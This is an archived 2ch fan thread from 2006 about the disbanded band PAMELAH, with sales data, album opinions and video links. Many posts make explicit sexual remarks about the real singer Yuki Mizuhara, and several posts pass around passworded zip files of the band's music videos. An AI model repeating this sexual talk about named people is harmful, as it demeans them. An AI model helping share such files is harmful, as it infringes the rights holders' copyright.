2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【巨乳・水原由貴】 PAMELAH伝説4 【もず・小澤正澄】

1 :マンコ:2006/05/12(金) 18:19:42
活動再開の願いも虚しく会報にて正式に解散発表。
ラストアルバム「complete of PAMELAH at the BEING studio」好評発売中。

放置オフィ
http://www.being.co.jp/pamelah/

前スレ
【水原由貴】 PAMELAH伝説Part3 【小澤正澄】
http://music4.2ch.net/test/read.cgi/legend/1115908594/

過去スレ
http://music.2ch.net/test/read.cgi/musicj/1018128758/
http://cheese.2ch.net/music/kako/982/982210319.html
http://curry.2ch.net/musicj/kako/999/999014885.html
http://salami.2ch.net/hrhm/kako/993/993259242.html
http://curry.2ch.net/music/kako/991/991931194.html
http://curry.2ch.net/music/kako/1000/10009/1000953064.html
http://music.2ch.net/musicj/kako/1011/10110/1011010300.html
http://music.2ch.net/musicj/kako/1011/10112/1011286794.html
http://music2.2ch.net/test/read.cgi/legend/1021959736/ (HTML化待ち?)
http://music4.2ch.net/test/read.cgi/legend/1055757677/

こちらは懐かし邦楽スレ
PAMERAH〜
http://bubble3.2ch.net/test/read.cgi/natsumeloj/1114081630/

2 :伝説の名無しさん:2006/05/12(金) 18:22:13
☆PAMELAH☆

[シングル]
95.02.21 *26位 *12回 **133,320 LOOKING FOR THE TRUTH
95.07.26 *30位 *12回 **108,410 I FEEL DOWN
95.11.08 *31位 **3回 ***43,280 キレイになんか愛せない
96.02.21 *26位 **4回 ***53,060 I shall be released
96.07.31 *20位 **8回 ***82,760 BLIND LOVE
96.11.20 *24位 **4回 ***58,900 涙
97.02.05 *15位 *10回 **137,530 SPIRIT
97.07.16 *25位 **3回 ***30,620 いとしいキミ
97.11.19 *37位 **2回 ***16,340 CONFIDENCE
98.06.03 *30位 **3回 ***21,830 TWO OF HEARTS
98.08.05 *34位 **2回 ***13,940 キズナ
99.02.24 *50位 **2回 ****9,110 記憶
99.06.02 *49位 **2回 ****6,820 許されない恋
99.08.25 *50位 **2回 ****7,760 individualism

[アルバム]
219,810 Truth
214,090 Pure
198,620 SPIRIT
251,810 HIT COLLECTION〜CONFIDENCE〜
*67,810 HEARTS
*11,750 REMIX EDITION〜PAMELAHOLIC〜
*26,700 ism
**5,143 complete of PAMELAH at the BEING studio


3 :伝説の名無しさん:2006/05/12(金) 18:25:19
水原由貴ソロ「LOVE IS PAIN」
http://www.tsutaya.co.jp/item/music/view_m.zhtml?pdid=20009932

4 :伝説の名無しさん:2006/05/12(金) 18:29:10
誰?これ。こんなのイタの?

5 :伝説の名無しさん:2006/05/13(土) 14:07:27
イズムがほしい。
イズムにI FEEL DOWN系の曲はある?

6 :伝説の名無しさん:2006/05/13(土) 19:29:51
記憶、この両肩を抱きしめてあたりはI FEEL DOWNっぽいといえばそうかもしれない。

詞の話だったら全然違うけど。
ismではI FEEL DOWNほど過激な歌詞は無いよ。

PAMELAH好きなら普通以上に気に入るアルバムだと思う

7 : ◆HAPJghGeYI :2006/05/13(土) 21:24:12
AZUKI7

8 :伝説の名無しさん:2006/05/13(土) 23:21:26
>6
レスありがとう。
I FEEL DOWN系の曲っていうのは哀愁ロックっていうか…
なんっていうのかな、明るい曲じゃないんだけどハジけてるというのかな。
歌詞っていうか曲調の部分で。
でも I FEEL〜の歌詞はかなり好き。せつない感じで。
アマゾンでイズム買います。


9 :6:2006/05/14(日) 00:34:50
>>8
>I FEEL DOWN系の曲っていうのは哀愁ロックっていうか…


最初からそう書いてほしかったな。
そういうタイプはismに入ってないよ。
でも傷跡とかあるからオススメのアルバムではある

10 :伝説の名無しさん:2006/05/14(日) 01:15:09
>9
え。
ないの?そうなの?そっかー。だよね。
HEATS聴いた限りではI FEEL〜系は無かったもんね…。
最初にHEATS聴いたときはビックリしたもんなぁ。
でもism注文したよ。聴くの楽しみ!


11 :伝説の名無しさん:2006/05/14(日) 02:51:02
私はパメラホリックとパメラカメラだけ持ってない

12 :伝説の名無しさん:2006/05/15(月) 04:04:49
ノータリン 火事で学校焼ければいいのに 私はモテモテでしたよ

13 :ぬ〜べ〜:2006/05/15(月) 23:28:42
僕はキャンドルとスピリットが特に好き
特に後者はも〜と好きです!
ぬ〜べ〜のエンディングのゆきめのぬ〜べ〜を想う切ない表情とすごく曲がマッチしてたよ


14 :伝説の名無しさん:2006/05/16(火) 00:49:03
パメラホリックなんて2,3回しか聞いてないな。パメラ好きなら逆に買わない方がいいんじゃない?!
部苦オフで\250でめぐり合えて良かった・・・WANDSの黒ベストよりヒドイ感じじゃないかなぁ。

15 :伝説の名無しさん:2006/05/16(火) 00:50:11
まぁ、パメラホリックは怖いもの見たさという感じで購入する人は検討してはいかがでしょうか。

16 :べ〜ぬ〜:2006/05/16(火) 00:59:20
コンフィデンスは何のアルバムに収録だったかな?
教えてけろ〜!

17 :伝説の名無しさん:2006/05/16(火) 01:40:17
コンフィデンスはHEATSに収録かな?あとはベストか。

私もパメラホリックには泣いたよ。まぁブクオフで500円で釣ったんだけどさw
数回聴いて放置プレイだよw
普通に新品で買おうとも思ったこともあったからねー。
もし新品で買ってたら発狂してただろうな。
あんな下手にシャレオツなリミックスにしないで
いっそユーロビートverにしてくれたらよかったのに。
何気にブクオフではパメラホリックよく見かけるけど被害者多数なんかな。


18 :マン山田:2006/05/16(火) 02:10:16
呼んだかお(^ω^)

19 :べ〜ぬ〜:2006/05/16(火) 02:11:22
あらがとう!
俺もホリックじゃないけどismは放置playだな〜
往年の哀愁メロディーが・・・
95,96年はよかったな〜

20 :伝説の名無しさん:2006/05/16(火) 09:52:55
私はTruthがベストアルバムだと思ってます

21 :伝説の名無しさん:2006/05/16(火) 10:40:00
由貴のマンコにちんちんいれたい。由貴のデカぱいでパイずりして、顔面発射!由貴はまじでいいおっぱいしてるぜ!

22 :伝説の名無しさん:2006/05/16(火) 11:52:34
>19
ism放置プレイしてんの?
哀愁メロディないの!!?がーーーん。
注文しちゃったよ。。

23 :べ〜ぬ〜:2006/05/16(火) 12:28:10
>22
他の御方様はどう感じておられるかわからないけど、初期3アルバムに収録されてるような哀愁、劇メロの曲はないに近いと思う
強いて言えば、哀愁あるのは6番の「記憶」ぐらいかな。
今までよりも曲がヘビーになってると思う。
22氏のパメラに対するホトバシル熱い想い、感動した!

24 :伝説の名無しさん:2006/05/16(火) 13:01:15
>>21
同意

25 :マン山田:2006/05/16(火) 15:39:24
>>22
由貴タソきっと喜んでくれると思うお(^ω^)

26 :伝説の名無しさん:2006/05/16(火) 15:49:28
今ならばできる気がした

27 :伝説の名無しさん:2006/05/17(水) 02:29:20
由貴まんこ、ヤリタイ。

28 :伝説の名無しさん:2006/05/17(水) 04:32:23
由貴ぱい、なめたい。

29 :伝説の名無しさん:2006/05/17(水) 07:00:47
今水原由貴が何をやっているのかすごく気になる
やっぱり函館にいるのかな

30 :伝説の名無しさん:2006/05/17(水) 07:07:51
↑同じ意見ですね。どなたか知っている人はいますか?

31 :伝説の名無しさん:2006/05/17(水) 11:18:33
>>30
過去スレの頃からちょくちょく話題になるけど情報皆無。

32 :伝説の名無しさん:2006/05/17(水) 17:21:08
由貴でシコってる人いる?ノシ

33 :伝説の名無しさん:2006/05/17(水) 17:36:10
もちろん、由貴のデカパイで毎日オナニーさ。

34 :伝説の名無しさん:2006/05/17(水) 18:16:56
俺はI FEEL DOWNのPVで抜いてる。
おっぱいをやたらと強調した衣装だし上下にリズムとって揺れるシーンが多い。

35 :伝説の名無しさん:2006/05/17(水) 21:00:44
ユキパイ

36 :伝説の名無しさん:2006/05/18(木) 01:16:12
>>32
俺様の場合はBABY×2の声だけで抜いてりゅです。

37 :伝説の名無しさん:2006/05/18(木) 02:00:30
>>36
そのコツを教えてください!

38 :36:2006/05/18(木) 02:46:17
>>37
この曲はサヴィから始まるので、最初からマッハでこく必要性が、あるぞ!
まず条件反射で、由貴タソの声を聴くと三秒でビソビソのクセを付けろ。
射精のタイミングとしては最後の「THAT'S THE WAY」で逝くもいいが、
一曲が終ると同時にという方法もある。
ちなみに俺様は限界までこきたいので後者だ。三分と短いが、健闘を祈る。

39 :37:2006/05/18(木) 03:03:13
>>38
かなり明細なご教示、感謝します。
僕のリボルケインの耐久性がそこまで持つかわかりませんが、チャレンジする価値は多いにあると思いますので
いざっ!!
※詳細は追って報告します


40 :36:2006/05/18(木) 03:26:33
>>37
仮面ライダーか!?結構マニアなんだな。
ガンガレ。報告を楽しみにしておるぞ。
これで逝けたら真のパメラファンだ。

41 :マン山田:2006/05/18(木) 03:48:35
抜けないに100ペソだお(^ω^)

42 :伝説の名無しさん:2006/05/18(木) 13:41:23
絶対に抜けるから水原由貴なんだよ!

43 :伝説の名無しさん:2006/05/18(木) 13:48:54
由貴ぱいバンザイ。俺もオナルぞ。

44 :マン山田:2006/05/18(木) 15:15:27
確かに萌える声だけど、それだけで抜けるのかお(^ω^;)
おまいら凄いお(^ω^)

45 :伝説の名無しさん:2006/05/18(木) 16:57:15
( ^ω^)「掠奪」なんか歌詞読んでるだけで抜けるお

46 :マン山田:2006/05/18(木) 17:13:38
上には上がいるお(^ω^;;)

47 :伝説の名無しさん:2006/05/18(木) 17:22:26
みんなユキちゃんに萌え萌えなんだね〜
オナー二のネタにされるなんて愛されてるよね
私は小澤タンに萌え〜
オナー二もしてるよっ!

48 :マン山田:2006/05/18(木) 17:45:33
(^ω^)おっ(^ω^)おっ(^ω^)おっ
>>47
当然だお(^ω^)
鼻血が出て白いものも出て、まるで一人紅白歌合戦だお(^ω^)
小澤タソも交えて3P、いつでも妄想だお(^ω^)

49 :マン山田:2006/05/18(木) 18:00:30
>>47
良かったらどのタイミングでイクか教えてくれお(^ω^)

50 :伝説の名無しさん:2006/05/18(木) 18:26:32
まるで別のスレのよーな雰囲気だなぁ。

自分がホモだからそう思うのかもしれないけど水原さんって綺麗だけど美人じゃない気がするんだよなぁ…


小澤さんは萌え。ちょっとかこいい。今はどうだか知らないけどw

51 :伝説の名無しさん:2006/05/18(木) 20:24:56
チャレンジしてみたけど俺には無理だったよ

52 :伝説の名無しさん:2006/05/18(木) 20:39:23
>>37はどうした?

53 :伝説の名無しさん:2006/05/18(木) 20:58:05
>>38
ご教示の通りやってみました
はじめのサビをマッハでシゴいたところ、いきなり第一次スピリット汁がドラスティックに発射されました。
自分はアカンタレじゃない事を水原氏に見せ付けるごとく、なんとか小澤氏のGソロまでたどりつきました。
小澤氏のホトバシルギタープレイに動揺して、なぜか小澤氏の金玉半分を想像してしまいました
※僕は>>50様みたいに日出郎の様なホモではございません
小澤氏の片玉無料サービスの恩を受け、このままスムーズにイケると思いきや、手元にティッシュがない事に気づきました。
その緊急事態に動揺し、自分のコンフィデンス棒の操作を誤り、ismに付録されていたシールの上に発射・・・
自分には>>38様の様な荒業はできない事がわかりました。
恋のルール 自分次第
オナニーのルール 自分次第





54 :38:2006/05/18(木) 21:18:48
>>53
ありがとう。久々に爆笑したよw
抜く事が出来た>>53の情熱に感動した。
初挑戦で抜けたなんて、凄いぞ!
シールに顔射されて由貴タソも喜んでるお(^ω^ )
金玉は知らんが、俺様も初めはソロで萎えちまう事もあった。
でも今では小澤タソのソロから加速を付けて絶頂へ持って逝けるモチヴェーションだ。
これからもこれに懲りず、精進あるのみだぞ。

55 : ◆oI9TBseQk2 :2006/05/18(木) 21:32:43
しめじ55

56 :53:2006/05/19(金) 00:18:33
今度は大好きなSPIRITで自慰メンします!
SPIRIT発売当時はまだ家にCDプレイヤーがなかったので、それが聞けた土曜5時台は至福のひと時でした。


57 :伝説の名無しさん:2006/05/19(金) 02:11:15
由貴パイ、サイコー 由貴マンコ、サイコー

58 :伝説の名無しさん:2006/05/19(金) 02:44:38
ちょっとなにこの変態な流れは!
あんたらってパメラの曲をオナニーに使ってんの!?
私は女だから曲でオナったりはしないけど
小澤でオナったことは数知れずだorz
アルバム「Truth」の歌詞カードの「I FEEL DOWN」のページに載ってる小澤が
すんごく可愛くって濡れる…。
あとはベスト(HIT コレクションの方ね)のジャケットの小澤。かっちょえー。
ギュンギュンキタープレイにも萌える!


59 :伝説の名無しさん:2006/05/19(金) 03:30:10
今からキレイになんか愛せないのプロモでオナニーする。
黒でキメたゆきたんがいやらしいカメラ目線連発で即勃起&射精

60 :伝説の名無しさん:2006/05/19(金) 03:57:45
由貴たんで毎日オナニー三回

61 :伝説の名無しさん:2006/05/19(金) 04:26:10
>>58
包茎女だw

62 :伝説の名無しさん:2006/05/19(金) 06:49:59
コロはまだ元気なのかなぁ

63 :伝説の名無しさん:2006/05/19(金) 06:51:19
つうか勝手にオナヌしててくれw 宣言しなくていいよもうw

64 :伝説の名無しさん:2006/05/19(金) 06:52:19
ゆきたん ゆきたん

65 :伝説の名無しさん:2006/05/19(金) 06:54:50
俺も今から由貴ぱいでオナニーさ

66 :伝説の名無しさん:2006/05/19(金) 12:51:44
>>61
包茎女さん何気に好き
さばさばして男勝りな性格とエロさが水原さんぽい

67 :伝説の名無しさん:2006/05/19(金) 13:25:47
SPIRITでヌコうとしたのですが、サビのところまではよかったのですが、サビの「YESのイイコは」のYESでいきなり僕の思考回路に「YES!高須クリニ〜ク!」のフレーズが入ってきてしまい萎えてしまいました。
さすがに高須院長でヌクわけにはいかないので強制停止いたしました。


68 :伝説の名無しさん:2006/05/19(金) 21:39:57
>>67
いつもいいところで変な邪魔が入るねw
やっぱ声だけじゃ難しいんぢゃね?

69 :伝説の名無しさん:2006/05/19(金) 23:03:00
http://www.youtube.com/watch?v=cyQjtTL1hf4&search=PAMELAH

一曲しかないのか…

70 :伝説の名無しさん:2006/05/19(金) 23:19:58
>>70

懐かしい!
CONFIDENCEぐらいまでは出てたよなぁ
久しぶりにCLIPS見るかな

71 :伝説の名無しさん:2006/05/19(金) 23:21:23
アンカーミスったorz

72 :伝説の名無しさん:2006/05/19(金) 23:37:53
徳チャン!

73 :伝説の名無しさん:2006/05/20(土) 01:29:26
>>69
後ろに座ってるメンツテラワロス

74 :伝説の名無しさん:2006/05/20(土) 01:51:59
>>68
難しすぎてヘドが出そうです。
横綱はおろか、十両止まりです
ミュージックオナニーからは引退します。
「もう、体力の限界」
>>69
ヒット数が少なすぎますよね
PVが見たかったです
PAMELAHのPV童貞です



75 :伝説の名無しさん:2006/05/20(土) 02:27:27
>69
うわー感動!
PAMELAH解散後にファンになったから
歌ってるとこ以外の場面って初めてみたよ。ユキちゃんの話声かわいいな。
PC疎いんだけど>69の動画って保存できるのかな。


76 :伝説の名無しさん:2006/05/20(土) 05:02:13
>>75殿
「youtube動画保存」でぐぐるのです。
そしたら保存の仕方がわかるのです。

77 :伝説の名無しさん:2006/05/20(土) 11:40:47
76さんありがとう。
ネットとは、すごいものだね!

78 :伝説の名無しさん:2006/05/20(土) 21:32:08
あの日ぃーの、私ぃーに、ケェリ入れぇたぁい

79 :伝説の名無しさん:2006/05/21(日) 06:51:31
(^ω^)おっ(^ω^)おっ(^ω^)おっ

ゆきたんゆきたん


80 :伝説の名無しさん:2006/05/21(日) 22:26:22
シューティングスターPV。
|´・ω・)up25550.zip
DLパスは今日8
解答パスは焼酎3杯

81 :伝説の名無しさん:2006/05/21(日) 23:10:01
>>80
ローダの場所が和漢ね〜!!
初心者版逝った方がいいのかな・・・orz

82 :伝説の名無しさん:2006/05/21(日) 23:11:05
>>80
どこに上げたの

83 :伝説の名無しさん:2006/05/21(日) 23:29:21
いや・・・・そのまんま「|´・ω・)」をコピって検索して下され。

84 :81:2006/05/21(日) 23:35:47
>>83
結構時間がかかったけど、どうにか探すことができました・・・。
ありがとうございます!雪短最高でしたよ!!

85 :伝説の名無しさん:2006/05/21(日) 23:51:01
>>80
トンクス!


86 :伝説の名無しさん:2006/05/22(月) 00:19:52
こんな難しいの初めてだわ。

87 :伝説の名無しさん:2006/05/22(月) 00:24:16
何故かぅpろだに入れないんやけど。

88 :80:2006/05/22(月) 00:44:08
ごめーん。
|´・ω・)じゃなかったわ。
下記ので検索してね。
(´ー`)ノ⌒θ

89 :伝説の名無しさん:2006/05/22(月) 00:46:43
>>86-87
オレ漏れも( ´;ω;`)

90 :伝説の名無しさん:2006/05/22(月) 00:50:48
>>80
ありがとー!
NO.で観た時を思い出した。

91 :伝説の名無しさん:2006/05/22(月) 00:50:48
私も駄目だ

92 :伝説の名無しさん:2006/05/22(月) 00:56:55
>>88
おk
貴重な流星ありがトン

93 :伝説の名無しさん:2006/05/22(月) 00:56:52
>>ddddd

94 :伝説の名無しさん:2006/05/22(月) 01:05:58
パスに今日8 って入れても無理なんだけど、どうして。。。


95 :伝説の名無しさん:2006/05/22(月) 01:09:31
>>94
自分も無理だった。

96 :伝説の名無しさん:2006/05/22(月) 01:09:57
>>94
それは隠語だから

97 :95:2006/05/22(月) 01:17:04
>>96
解決した。ありがとう。

98 :伝説の名無しさん:2006/05/22(月) 01:17:49
全くわからない。PAMELAHに関係あるんですか?

99 :伝説の名無しさん:2006/05/22(月) 01:22:03
>>98
ここにヒントがあるよ。
ttp://moech.net/key.html

100 :伝説の名無しさん:2006/05/22(月) 01:28:09
>>99
とっても優しい殿方ねぇ〜ノンケを好きになりそう

101 :伝説の名無しさん:2006/05/22(月) 01:31:34
>>80
ありがとう。

102 :伝説の名無しさん:2006/05/22(月) 01:32:20
>>80
どうもです。

103 :伝説の名無しさん:2006/05/22(月) 01:35:11
>>80
ありがとうございます。
>>99
ホント感謝します。ありがとうございます。

104 :伝説の名無しさん:2006/05/22(月) 04:39:41
「Shooting Star」って「I FEEL DOWN」のCWなんだね。
普通にA面でも逝けるジャマイカ?
BABY×2もだけど、結構もったいないね。

105 :伝説の名無しさん:2006/05/22(月) 13:47:48
「忘れたいのに」「It's my fault」も普通にシングルきれる

106 :マンコ:2006/05/22(月) 14:35:26
>>104-105
BESTにも入ってるぐらいだし完成度は高いよね

107 :80:2006/05/22(月) 20:42:36
パメラファンのあなたなら持ってるかも知れませぬが。
LOOKING FOR THE TRUTHのVIDEO CLIPS1とは別バージョンのPV。
(´ー`)ノ⌒θ up25648.zip
DLパスは小澤様の誕生日を4桁。
解答パスは水原様の誕生日を4桁。

108 :伝説の名無しさん:2006/05/22(月) 21:37:49
>>107
コレは初めて見たよ。ありがと。

109 :伝説の名無しさん:2006/05/22(月) 22:14:32
DREAM AGAINもイイ
つか最初の4枚のカップリング、どれか1枚ぐらいA面にした方が
目先も変わってよかったのに
いとしいキミ以外ハードな曲ばかりA面にしたのは小澤のこだわりか?

110 :マンコ:2006/05/22(月) 22:51:24
ファーストアルバムの完成度の高さは異常

111 :伝説の名無しさん:2006/05/22(月) 22:56:16
>>80
解凍passの焼酎3杯というのも隠語ですか?そのまま入れても解凍できません。

112 :伝説の名無しさん:2006/05/22(月) 23:21:27
恋愛するだびパメラ聴いてます。
パメラFANが聴く最近の曲って何ですか?
解散してしまって新曲が聴けなくて寂しいので・・。


113 :伝説の名無しさん:2006/05/22(月) 23:47:02
>>111
99のサイトを見ればわかる。
ttp://moech.net/key.html

114 :伝説の名無しさん:2006/05/23(火) 00:11:17
>>109
小澤じゃなく、プロデュース上のこだわりでしょーね。
ビーイングだしある意味クライアントの都合かもしんないけどw

2ndは春発売が発表されてた(タイトル未定)のに
実際にはI FEEL DOWNが出たのは夏だったとか、
その他歌詞の内容とか作詞者のクレジットとかを考えると、
本当はDream Againが2ndシングルのつもりだったんじゃないかと妄想してます。

>>112
普段はシングルとそのc/wをシャッフルして聞いてて、
個別に聞くのは包茎女さんの指摘したジャケットの曲とw、
曖昧、かなー。
アルバムはその時々の気分で。Pureが多いかも。

115 :伝説の名無しさん:2006/05/23(火) 01:55:11
包茎女ってなんだよw

116 :伝説の名無しさん:2006/05/23(火) 02:29:45
>>107
またまたいただきました。
貴重なものありがとう!!

117 :伝説の名無しさん:2006/05/23(火) 02:49:08
>>107
ありがとう。最後の小澤タソ、ティムポこすっているような感j(ry

118 :伝説の名無しさん:2006/05/23(火) 15:54:40
ひとあし遅かった・・
再うpお願いします!!

119 :伝説の名無しさん:2006/05/24(水) 00:53:48
>>1 マンコ 乙

120 :伝説の名無しさん:2006/05/24(水) 01:58:43
スピリットのPV持ってるやつ
惜しんでないでとっとと出せや。


121 :伝説の名無しさん:2006/05/24(水) 03:40:32
>>130は由貴タソ

122 :伝説の名無しさん:2006/05/24(水) 03:41:18
大好き由貴たん

123 :伝説の名無しさん:2006/05/24(水) 08:25:12
>>130は小澤くん

124 :伝説の名無しさん:2006/05/24(水) 08:26:21
パメラで書き込みか>>130

125 :伝説の名無しさん:2006/05/24(水) 19:05:31
>>130に期待

126 :伝説の名無しさん:2006/05/24(水) 22:15:00
>>120
何故か強気なクレクレ厨

127 :伝説の名無しさん:2006/05/25(木) 01:38:40
Mステ出演動画持ってるやつ、もっと晒せや

128 :伝説の名無しさん:2006/05/25(木) 01:50:57
www

129 :伝説の名無しさん:2006/05/25(木) 01:51:46
>>130

130 :伝説の名無しさん:2006/05/25(木) 03:42:00
抱かれた夜は
黙って帰ることにするわ
プリーズプリーズプリーズGO ON!わがままなくらい愛をくださーい!!

後藤真希 抱いてよ!プリーズGO ON!

131 :伝説の名無しさん:2006/05/25(木) 03:42:56
期待させて悪いのだが、
http://youtube.com/watch?v=kkwqH3ON7xQ&search=nube
これで我慢してくれ
(殺られるな・・・)


132 :伝説の名無しさん:2006/05/25(木) 03:48:56
>>130
ちょwwwっおまwwwwwすげ〜ボケ殺しwwwwwwwww

133 :伝説の名無しさん:2006/05/25(木) 03:50:13
>>131
(^ω^)これでクレクレ厨も喜ぶと思うお サンkス

134 :伝説の名無しさん:2006/05/25(木) 17:59:58
>>131
反日国家中国で放送されてるなんて皮肉なもんだな・・・

135 :伝説の名無しさん:2006/05/25(木) 21:31:41


        _人__
       ≦      ゞ
      ≦ ノノノノ ゞ ≧
      ミ / \  /|ミ  
       6 ` ´ 」` |    み・や・びなSPLASH!
        \ ー. /
        ノ  ̄(   n
       (⌒   \ .( E)    。ρ゚。
        \  \_//   /⌒゚。゚
        //\  _/)   ゝ  .ノ
        //  \   )  /  / 
       υ   (  . |/  ./
            |     / 
          . ノ  ノ●●
          丿 丿|
         / /| /
        //  μ
        ∪



136 :伝説の名無しさん:2006/05/25(木) 23:01:16
超級巨乳的美少女 覇芽羅

137 :伝説の名無しさん:2006/05/26(金) 21:07:14
今夜もなんかクレクレ

138 :伝説の名無しさん:2006/05/27(土) 16:22:45
>>138なら活動再開
レコ社はB-Gram

139 :107:2006/05/27(土) 22:01:22
107と同じ場所にby the seaのPV
あまり印象になかったけどPVを見るといい曲だなと思えてくる。
up26199.zip
DLパスは小澤タンの4
解答パスは由貴タンの四


140 :伝説の名無しさん:2006/05/27(土) 23:43:11
ゆきたその四で解凍できないっす

141 :伝説の名無しさん:2006/05/27(土) 23:43:53
4でも

142 :伝説の名無しさん:2006/05/28(日) 01:00:26
解凍パスワードだのなんだの面倒くさいことさせるなや。
どうせ大したもんじゃないんだ。勿体ぶんなや。
とっととYOU TUBEにPVとか動画晒せや。早くしろや。
動画みせろや。

143 :伝説の名無しさん:2006/05/28(日) 01:01:23
動画まだか?晒せや。
ビデオ持ってんだろう?ホコリかぶってんだろう?

144 :伝説の名無しさん:2006/05/28(日) 01:03:44
必死だねえ

145 :伝説の名無しさん:2006/05/28(日) 03:28:29
また大阪か

146 :生粋の大阪人:2006/05/28(日) 16:28:41
でも、かなりの熱意が伝わってくるね
だけど、大阪人のマネしてるだけと思う



147 :伝説の名無しさん:2006/05/28(日) 19:18:05
ビデオはあるがその態度が気に入らない。

148 :伝説の名無しさん:2006/05/28(日) 19:52:05
139の解凍できないのって自分だけか。。。

149 :伝説の名無しさん:2006/05/28(日) 21:12:15
漏れもできないよ;_;

150 :伝説の名無しさん:2006/05/28(日) 22:12:01
>>148
〇三〇四

151 :伝説の名無しさん:2006/05/28(日) 23:05:55
>>150
ありがとうございます。

152 :伝説の名無しさん:2006/05/29(月) 04:55:42
ありがとうございました

153 :伝説の名無しさん:2006/05/30(火) 01:58:11

-------------------------- 緊急速報!! --------------------------

愛内里菜 渾身の★5thアルバム『DELIGHT』5月31日発売!!

  「PLAYGIRL」から1年半ぶりとなるニューアルバムはキラ☆度120%!!
  弾けるダンス・ポップから真骨頂の哀愁系ダンスチューンまで、全14曲収録!!
  発売日:5月31日  品番:GZCA-5079  価格:3,059yen(tax in) / 2,913yen(tax out)

5th ALBUM『DELIGHT』
5月31日発売!!
収録曲
01.DELIGHT
02.GLORIOUS
03.PRECIOUS PLACE
04.Believe your Bravery
05.LOVE OR BE LOVED
06.赤く熱い鼓動
07.MIRACLE
08.REASON
09.しるし
10.WESUMMER
11.モーニングエール
12.ORANGE★NIGHT -La La La Lovin' you Mix-
13.SET YOU FREE
14.I'll be delighted

元ビーイングのPAMELAHファンの皆さんならこのアルバムのよさが分かるはずです!!
ぜひ手にとって愛内里菜のその世界観を体感してください!!



154 :伝説の名無しさん:2006/05/30(火) 19:22:03
>>153
(゚听)イラネ

155 :伝説の名無しさん:2006/05/30(火) 20:25:19
愛内のアルバムは買ったよ〜
いいよ!みんなも買え!

156 :伝説の名無しさん:2006/05/30(火) 23:12:53
愛内ファンの熱心さはスゴイな。
そこらじゅうにはってるよ

157 :伝説の名無しさん:2006/05/31(水) 08:10:44
PAMELAHを聞くと便意を催すのですが、そんなことないですか?
あと木村由姫、HALもPAMELAH程ではないですが便意を催します。

158 :伝説の名無しさん:2006/06/01(木) 02:33:13
昔、AXSのセカンドアルバムの中の、あるバラード曲を聴くと
必ず下痢になるっていうファンのやりとりをネット上で見かけたのを思い出したw
デジタル音に腸が反応したのかな。

159 :伝説の名無しさん:2006/06/02(金) 10:25:29
電話集めるのが趣味なんだっけか
Mステで見た記憶がある

160 :伝説の名無しさん:2006/06/03(土) 13:17:37
良スレ発見!今日PAMELAHのCD作ったんだが
気になって検索してみたらビックリさ。

一曲目はデビュー曲 「キレイに〜」 で締めは4th.Albumから 「STAR LIGHT」
我ながらイイ出来だと思った。

一番のお気に入りは・・・決められん!ってかどんな曲も似てる・・・
強いて言えばBLIND LOVE 「蹴り入れたい」 か。ちょいファンの落書きでした、では。

161 :伝説の名無しさん:2006/06/03(土) 22:50:18
デビュー曲は「LOOKING FOR THE TRUTH」だぞ

162 :伝説の名無しさん:2006/06/04(日) 00:39:03
ごめん!ちょいファンだからあんま詳しくないんよ。
ほんとにすまんこ許してちょ。

163 :伝説の名無しさん:2006/06/04(日) 00:42:26
う・・・160だが、中学の頃からずっと「キレイに〜」だと思ってた。
どうして勘違いしてたんだろう?情報修正に貢献してくれてありがとう。
とりあえず好きって事でした。

164 :伝説の名無しさん:2006/06/05(月) 00:48:24
ビデオクリップ2がほしい

165 :伝説の名無しさん :2006/06/05(月) 06:53:59
http://www.youtube.com/watch?v=kkwqH3ON7xQ&search=nube

懐かしいな。オイ

166 :伝説の名無しさん:2006/06/05(月) 15:57:14
どうでもいいことかもしれないけど・・・
ヤフオクの出品画像見ると『VIDEO CLIPS-1』の透明カバーの表と裏を逆に被せてる人多いよね。

本来は箱の水原の写真に透明カバーの小澤がうっすらと重なるデザインなのに、、、、
        (小澤の写真に透明カバーの水原)

こんなふうに水原の面に対して更に水原の面を重ねてる写真が多い。
http://page11.auctions.yahoo.co.jp/jp/auction/n35775427


167 : ◆6TLZAZcoiY :2006/06/05(月) 20:00:28
>>164
1も2もブクオフにて150円でゲト

168 :伝説の名無しさん:2006/06/06(火) 01:09:34
>>167
1も2も発売日に定価でゲト

169 :伝説の名無しさん:2006/06/06(火) 02:04:02
本日フライングゲット日のため

---------------------------------- 超緊急速報!! ----------------------------------

もはや、説明不要! 日本最高峰のロックユニットB'zの新曲「SPLASH!」6/7発売決定!

日本屈指のハイトーンヴォーカリスト稲葉浩志の心に響く卓越したリリックに
天才コンポーザー松本孝弘(TAK MATSUMOTO)のメロディーが重なる夏らしいはじける
ノリノリのサマー・ロック・チューンになっています!!

そして!何と初回限定盤には2005年のライブ「CIRCLE OF ROCK」映像から厳選された
迫力のライブ映像 「愛のバクダン」・「パルス」・「Fever」それぞれを収録した特典DVD付!
発売日:2006年6月7日 価格、初回限定盤(3種類)の内容は以下の通り

【曲名】
1st beat:SPLASH!
2nd beat:MVP

【初回限定版】1,575yen(tax in)
1. グリーン/ CD+特典DVD「愛のバクダン」
2. ブルー/ CD+特典DVD「パルス」
3. イエロー/ CD+特典DVD「Fever」

【通常版】1,050yen(tax in)
レッド/CDのみ(特典映像はつきません)

元ビーイングギザグループのPAMELAHファンの皆さんなら、この最高峰のロックサウンドの
よさが分かるはずです!! ぜひ手にとってB'zのその世界観を体感してください!!
そしてよろしければバージョン違いを1枚ずつ最低4枚買っていただけると幸いです!!



170 :164:2006/06/06(火) 15:23:34
>>168
うらやまスィ〜
>>167
もっとうらやまスィ〜

171 :伝説の名無しさん:2006/06/07(水) 09:15:09
PAMELAHスレなんてあったのか。
今日の23時に所持してるMステの動画流すわ。

172 :伝説の名無しさん:2006/06/07(水) 09:36:42
わーい

173 :伝説の名無しさん:2006/06/07(水) 11:31:47
4,5年前ローカルのランキング番組で
必死こいてPAMELAHの映像録画してたな・・・
Mステでいとしい君を黒いドレスで歌ってるのもあったはず
久しぶりに見てみよう

174 :伝説の名無しさん:2006/06/07(水) 17:11:58
J-ROCK COUNT DOWNか。

175 :伝説の名無しさん:2006/06/07(水) 22:23:24
Mステの「いとすいキミ」を歌う由貴タンは赤いTシャツにジーンズだよ。
黒ドレスは「キズナ」かと。

176 :伝説の名無しさん:2006/06/08(木) 00:01:10
ごめんなさい。
キズナでした。
しかしおっぱいでかいな。

177 :伝説の名無しさん:2006/06/08(木) 13:58:49
211 名前:昔の名無しで出ています[sage] 投稿日:2006/06/02(金) 20:33:33 ID:???
